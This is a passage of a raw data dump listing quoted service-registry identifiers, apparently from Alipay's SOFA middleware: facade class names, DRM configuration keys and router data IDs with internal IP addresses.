acade.api.miniappkeep.MiniAppKeepFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_PCREDITAUTHCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.scheduler:name=com.alipay.scheduler.biz.shared.resource.TaskTransferResource.snapshotWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpdcore:name=com.alipay.fin.prodquery.client.Cache.catalogTree.refreshAllCommonCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.ipaydecision.service.api.WithdrawChannelConsultService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.42.34#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.chargefront.service.facade.credit.api.ChargeCreditServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.service.integration.baoxiancore.CoreReportServiceClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.iexchange.service.facade.fx.api.FxResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.testcenter.devapi.facade.ToolDictFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zqueue.client.qaZQueue22#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finadvisorcenter.common.service.account.facade.AdvisorAccountAuthFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finatp.common.service.facade.message.AcceptMessageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finbaservice.common.service.facade.businesstype.api.BusinessTypePropsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.148.246#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.abilityprod.common.service.facade.appeal.AppealQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mydds.core.engine.service.api.ReleaseService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.datapoint.LocalDataPointValidateService:1.0:rulepub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.0.150.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.etetestcore.service.api.yeb.YebTransOutQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:decisionx@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inspectprod.common.service.facade.rulemanage.SynchronizeRule:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.autoinsprod.common.insure.AutoInsQuoteFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.identifycore.common.service.manage.api.ProductNodeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.176.128#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.wishTairCache.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:strategyApproveCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.biz.shared.drm.DrmData.companyConfigStep,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.workflow.common.service.facade.api.tsd.TsdAbilityFacade:1.0:workflow_tsd_appInfoQueryAbilityFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcp.service.facade.kb.contactperson.KbContactPersonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.minitrans.service.facade.commonfund.api.CftransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hyp.common.service.facade.BizDomainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.discount.common.service.facade.merchant.MerchantDstCampaignQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxtrade.common.service.facade.order.HedgeOrderManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:clearingcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.common.service.facade.execute.ChangeServiceSyncExecuteFacade:1.0:opscloudflow@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.PublicFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobileappcommon.common.service.facade.img.ImgQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.adapter.PluginSpecQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.sfa.api.SfatransManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.158.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudprovision:name=com.alipay.antvip.client.internal.drm.DrmControl.allAvailable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.irlab.facade.ShadowRiskDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pcardsales:name=com.alipay.common.datacollector.rule.internal.DataModelRuleCoordinator.dataCollectWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableAuthFilter,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.overseaprod.common.service.remitminiprogram.tr.RemitNotificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bksigncentre.common.service.facade.api.ProductQueryServiceFacade:1.0:bksigncentre_productQueryServiceFacade@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpcscgateway.biz.xrc.restful.TaskService#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pointcore.common.mpoint.facade.MpointQuotaConfigManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.schedulerweb.service.facade.operate.TaskOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbtraffic.common.service.facade.api.schedule.StrategyScheduleInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.core.service.physicaltransactionfund.PhysicalFundTransactionModelFundCapabilityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapi.facade.partner.PartnerExterfaceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.notExistExpireTimeMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipayplus.mobile.component.common.facade.codec.CodecEncodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.approval.ApprovalRecordServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.grscore.common.service.facade.api.dailymng.FinanceSumFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ordercore.product.common.service.api.view.ConfigRuleQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.execute.Executer:1.0:giftAsyncReceiveExecuter$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.auditprod.common.service.facade.test.MockHighCpu:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antassistant.biz.rpc.service.MrpcBotServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.EtlFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revtrans:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MFINQUOTATIONPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.integration.masterdata.result.code.MasterDataQueryFacadeClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_RECON#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.msgbroker:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneColor,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_F_ALIFI_CEIF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mirrorprod.facade.gateway.service.MirrorModelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recadmin.dmp.common.service.facade.api.CrowdManagerServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.discuss.TabConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zdataquery.common.service.facade.datastore.DataStoreZoneQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInGlobalSwitchValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.admgr.common.service.facade.UserConfigServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.zdal.ldc.tair.customerv2.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.permlimit:name=com.alipay.revol.drm.tenant.cifperm.specialLogFieldConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.links.common.service.facade.LinksRoomTokenFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.common.service.facade.lisa.LisaGateWayInfoProcessor:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.HavanaMemberQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.opensupport.common.service.facade.support.isc.OsIscStabilityScoreFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:PromoRecommend_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.pcDeliveryQuerySceneCodes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.mydds:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finpdcenter.facade.api.LayoutFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP-S-BANKCERTIFIER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityservice.facade.activeservice.IvrNbtModelProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.access.AuthPolicyServiceFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:PromoRecommend_recneptune@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_M_ITEM#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.fininfo:name=com.alipay.finsupport.component.cache.ctrldata.drm.CacheSwitchDRM.loggerSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instriskcenter.facade.api.InstCreditFormulaManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.152.174#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.securitydata:name=com.alipay.securitydata.biz.service.impl.drm.AntqMsgMngResource.listenerConfigs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zskynet:name=com.alipay.zskynet.integration.drm.AlarmCheckDRM.newEngineConcurrent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.bpaas.commontools.common.service.facade.FileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openeco.facade.codescan.MiniAppPackageScanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insproductcore.facade.service.InsChannelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:pricemng-priceValidAuditNodePre@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbasset.common.service.facade.stuff.api.BizLogQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.184.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finpwm.facade.finscenecore.api.SceneTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.seekers.facade.apis.RiskEntitySaveFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.sofa.rpc.elastic.ElasticService:1.0:test003@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.facade.api.PaasRequirementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:insautomarket@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.1.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publiccore.common.service.facade.ctlibwhitelist.ContentLibManangeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.xfireMaxConnectionMosn,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpublishuiweb:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.loadTestIslandMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_RECADMIN#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.integration.masterdata.result.code.MasterDataQueryFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.monitor.TaskTemplateMonitorStatisticQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_CSPLATFORM#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.bgw.BgwQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_S_ORDER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.useShardingUid,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.socialcore.facade.taskcenter.TaskApplyOrderQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.portrait.facade.UserPortraitBatchQueryFacade:1.0:xview@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.37#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finxbff:name=com.alipay.finxbff.weaver.unit.marketCurrencyLastYear,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Pub_Servers_TP_O_ZQUALITYPIVOT_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.158.39#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fundboss.common.service.facade.risk.QueryRulesByCoveredColumnsService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.101.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.scheduler:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.pointmng:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pricecenter.common.service.facade.api.price.PriceDescQueryStdFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ck:name=com.alipay.zdal.config.groupCluster.finbatch_pcconfigread_gc.ck,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promobench.common.service.facade.service.MyDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.pcx.service.ProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.sip.action.Action:1.0:gotoneTaskActionRepeat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP-S-AML_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.promocenter:name=com.alipay.promocenter.biz.daemon.drm.DiscountBizParamResource.action,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.linku.common.service.facade.acl.RoleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csguide.service.facade.api.GuideFlowQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.offer.OfferInputFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.distinguishprod.biz.invoice.service.InnerInvoiceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityassistant.common.service.facade.complain.swindle.SwindleReportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bpaas.commontools.common.service.facade.SensitiveWordDetectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.complainevent.drm.ComplainInfoDrmResource.fraudReportTaskTypes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antfin.inclusionconf.facade.service.user.LoginFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_topic#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.minitrans.service.facade.parentchildmodel.api.PcmtransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.topic.api.TopicRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdt.da.common.service.facade.api.MerchantIncomeStaticFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.commissioncenter.common.service.facade.api.BillInfoFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.NetworkDeviceRuleUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lifemng:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:iotbsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.35.116#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.permlimit:name=com.alipay.revol.drm.tenant.cifperm.logFieldJson,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.ifim.biz.risk.manager.RiskImpactAssessmentManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.biz.lfc.rpc.LifeCircleContentPBService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.smartsql.service.facade.service.AppTableMetricsServerV2#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.finfocore:name=com.alipay.checkroute.common.service.checkersdk.drm.SDKConfigDRM.logAmountCoverageRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:securityopenportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instpay.settleprod.service.facade.trade.PostInterfaceManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.compmng.service.facade.hf.service.HfHandleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.poscore.FinanceDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaDegradeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.promobench.common.service.facade.service.PromoBatchTaskManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zti@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.arater.common.service.triple.RateConsumeRecordStatus:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.RunnablePackageQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.grscore.common.service.facade.dataresource.api.AccessManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.CustomerServiceInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientSyncServiceFacade:1.0:ifcidentitycloud@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:templateDeleteProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.customscenter:name=com.alipay.cif.drm.PasswordRevokeSwitch.queryPasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zpublishuiweb:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInRouteValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.infosec.core.hbase.HBaseComponent:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.aip.profit.quotation.drm.QuotationConfigDRMResource.quotaDataSizeLimit,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.common.service.facade.fop.api.mng.MenuFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmerchantprod.common.service.facade.AcquirerInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:ifaatam@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ctuofflineplt.common.facade.service.VelocityRefluxService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.OptionalArticleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprovisioncore.common.facade.project.ProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:remindMergeLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.core.service.env.InsOpenProdEnvService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.etetestcore.service.integration.drm.DrmValidateSceneManager.channelDiscount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cif.facade.CustomizationWriteDbQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSprControlDrmResource.manualOrderRollback,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.52.80.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","HEALTHY_V2@quotetradecore#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","NS_Sub_Servers_TP-F-MINITRANS#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.paymentmng:name=com.alipay.zoneclient.internal.DynamicLdcSwitchResource.cityVipSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.ArgoTrProxyFacade:1.0:pcreditdmp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocenter.facade.api.union.MerchantUnionCombineService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.zoloz.zcore.facade.face.ZFaceService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_LOGINSESSION#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.181.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.rinsight.biz.customized.spi.ModelSnapshotSpi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.decisionx.facade.OuterDataQueryService:1.0:finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.stress.TinyAppStressFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bkmth.common.service.facade.service.TraversalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.delivery.rpc.AdvDiscountSendRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.102.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.31.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.prodmng:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.logLevelMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_10.15.242.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ucdpmngOnCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.revol.core.service.facade.ScriptChecker:1.0:cone_yudian_test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:artvcroom@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.bp.engine.service.BPQueryService:1.0:insmerchantprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.83.227#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.chargefront:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.